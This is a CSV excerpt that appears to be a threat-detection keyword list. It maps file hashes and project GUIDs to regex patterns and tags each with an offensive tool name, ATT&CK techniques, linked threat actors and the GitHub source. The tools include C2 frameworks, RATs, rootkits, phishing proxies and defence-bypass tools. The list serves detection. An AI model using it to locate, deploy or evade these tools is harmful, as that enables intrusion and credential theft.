"*05bce540784886cd80d5eb0da569bc6668dfbc910fb07c2e2742b7d009f6c61f*",".{0,1000}05bce540784886cd80d5eb0da569bc6668dfbc910fb07c2e2742b7d009f6c61f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21070"
"*05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8*",".{0,1000}05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21071"
"*05C00EED2E07D2BB64FFC34AA3BA0A8D9F0DE71909ABA35706A074F23285F83B*",".{0,1000}05C00EED2E07D2BB64FFC34AA3BA0A8D9F0DE71909ABA35706A074F23285F83B.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21072"
"*05c10f59c21e200d25112a44581eab14d4793bfdc4f4cad8a9e6b0d231f4f1aa*",".{0,1000}05c10f59c21e200d25112a44581eab14d4793bfdc4f4cad8a9e6b0d231f4f1aa.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","21073"
"*05cd2e1560111addd338faab64138b642f8ec40f344fe62f32f2cb762c94bcc3*",".{0,1000}05cd2e1560111addd338faab64138b642f8ec40f344fe62f32f2cb762c94bcc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21074"
"*05d4a816e74b958db190f12fea1d3eed7abfd964261d08c1d4fc4c8a07025519*",".{0,1000}05d4a816e74b958db190f12fea1d3eed7abfd964261d08c1d4fc4c8a07025519.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21076"
"*05dbe6775382b2e504716c2d1e1631eee298950cf4503072599d92cf07746190*",".{0,1000}05dbe6775382b2e504716c2d1e1631eee298950cf4503072599d92cf07746190.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21079"
"*05dd50b46ccb4f52cd5c44cdf5387de164753bbc9f4d6adae943a3077c7c1a55*",".{0,1000}05dd50b46ccb4f52cd5c44cdf5387de164753bbc9f4d6adae943a3077c7c1a55.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","21080"
"*05e4989bc256f214bcefda8e830675356a7aae0944fe114c7c4823c51f7cf2f2*",".{0,1000}05e4989bc256f214bcefda8e830675356a7aae0944fe114c7c4823c51f7cf2f2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21082"
"*05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5*",".{0,1000}05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","21083"
"*05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc*",".{0,1000}05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21084"
"*05f91a311b1c92776945a93cc3d8774f586d9d217f0f5e11ac54c351a50e7dc3*",".{0,1000}05f91a311b1c92776945a93cc3d8774f586d9d217f0f5e11ac54c351a50e7dc3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21085"
"*05f9e54b0f6e0e143de11f98094e43643acaf17e01e0f7387388dc6d91681322*",".{0,1000}05f9e54b0f6e0e143de11f98094e43643acaf17e01e0f7387388dc6d91681322.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","0","#filehash","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","21086"
"*05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6*",".{0,1000}05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21087"
"*05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac*",".{0,1000}05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21088"
"*05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9*",".{0,1000}05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21089"
"*0604bfcb72cf0604f64b66202027bf2cb5eca29ffa6cbf5fb1fe8646bd1551ef*",".{0,1000}0604bfcb72cf0604f64b66202027bf2cb5eca29ffa6cbf5fb1fe8646bd1551ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21091"
"*061425625f0c923443e3329439f21d03796f26b41c1b0e3628a2ea564ff733e8*",".{0,1000}061425625f0c923443e3329439f21d03796f26b41c1b0e3628a2ea564ff733e8.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","21093"
"*0614ec0ae3a38dd774d2e03dfeb05bad8e2c573f1943ab951c6129825bde4df8*",".{0,1000}0614ec0ae3a38dd774d2e03dfeb05bad8e2c573f1943ab951c6129825bde4df8.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","21094"
"*061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696*",".{0,1000}061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21095"
"*061f3dad40a1f13fc95fd287fc07408375eab69be817d75251e2619fabbd11cc*",".{0,1000}061f3dad40a1f13fc95fd287fc07408375eab69be817d75251e2619fabbd11cc.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21096"
"*062c58fd40ba2db0ca413999598afee2beabf79f16ca0308c0565e19614d8487*",".{0,1000}062c58fd40ba2db0ca413999598afee2beabf79f16ca0308c0565e19614d8487.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","21097"
"*0635410e9971416cf572e7103ae2b61cf5f51540f6fed034e8be7ae331b68df0*",".{0,1000}0635410e9971416cf572e7103ae2b61cf5f51540f6fed034e8be7ae331b68df0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21098"
"*063bc732edb5ca68d2122d0311ddb46dd38ff05074945566d1fa067c3579d767*",".{0,1000}063bc732edb5ca68d2122d0311ddb46dd38ff05074945566d1fa067c3579d767.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#filehash","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","21099"
"*063e8e1b8a6994c10bab6ccc8472674dac510c2417864904970a5d9e5626b030*",".{0,1000}063e8e1b8a6994c10bab6ccc8472674dac510c2417864904970a5d9e5626b030.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21100"
"*064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98*",".{0,1000}064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21101"
"*06500a1a2f152b59ceeb662d7bd5bb07175bf45a9c2528b2f6de58394ada4bc5*",".{0,1000}06500a1a2f152b59ceeb662d7bd5bb07175bf45a9c2528b2f6de58394ada4bc5.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21102"
"*06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f*",".{0,1000}06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21103"
"*065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f*",".{0,1000}065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21105"
"*065ce1ffbfb667546cfae3abfb257ebe7d37e03627b4ad1acd5c46543a45efca*",".{0,1000}065ce1ffbfb667546cfae3abfb257ebe7d37e03627b4ad1acd5c46543a45efca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21106"
"*065d34b6e01e8b1f150971ba0a3c565372ea2af62314e18215f062ffa2625335*",".{0,1000}065d34b6e01e8b1f150971ba0a3c565372ea2af62314e18215f062ffa2625335.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21107"
"*0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad*",".{0,1000}0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21109"
"*0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62*",".{0,1000}0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","1","N/A","N/A","N/A","N/A","21110"
"*068accaf38e4552f7b761845066b901afca8590c1bdcb66d639d52541a20a79c*",".{0,1000}068accaf38e4552f7b761845066b901afca8590c1bdcb66d639d52541a20a79c.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","21117"
"*0699ec05b54bc85473e88e53a615a630ca97c68bc8a96e126c1168245b0a74b6*",".{0,1000}0699ec05b54bc85473e88e53a615a630ca97c68bc8a96e126c1168245b0a74b6.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","21118"
"*069a9a0aece20ae241fe75e4ba6e1338f8292bf9510182883f649a32fe27604c*",".{0,1000}069a9a0aece20ae241fe75e4ba6e1338f8292bf9510182883f649a32fe27604c.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","21120"
"*06a0846262867cf39dcbd90d3be0d19470692f828cd24b9ed7c4b13dae8e02c5*",".{0,1000}06a0846262867cf39dcbd90d3be0d19470692f828cd24b9ed7c4b13dae8e02c5.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21121"
"*06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342*",".{0,1000}06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21122"
"*06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04*",".{0,1000}06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21123"
"*06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5*",".{0,1000}06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21124"
"*06a80d02597302885c6a7ed373187e751e82878f71826962e0c09e74647326d5*",".{0,1000}06a80d02597302885c6a7ed373187e751e82878f71826962e0c09e74647326d5.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","#filehash","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","21125"
"*06adfb5d349e0f02863abefa92b0ab3e605375651ea355581b97b864a2248110*",".{0,1000}06adfb5d349e0f02863abefa92b0ab3e605375651ea355581b97b864a2248110.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21126"
"*06AF1D64-F2FC-4767-8794-7313C7BB0A40*",".{0,1000}06AF1D64\-F2FC\-4767\-8794\-7313C7BB0A40.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","21127"
"*06B2AE2B-7FD3-4C36-B825-1594752B1D7B*",".{0,1000}06B2AE2B\-7FD3\-4C36\-B825\-1594752B1D7B.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#GUIDproject","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","21128"
"*06B2B14A-CE87-41C0-A77A-2644FE3231C7*",".{0,1000}06B2B14A\-CE87\-41C0\-A77A\-2644FE3231C7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","21129"
"*06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd*",".{0,1000}06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21131"
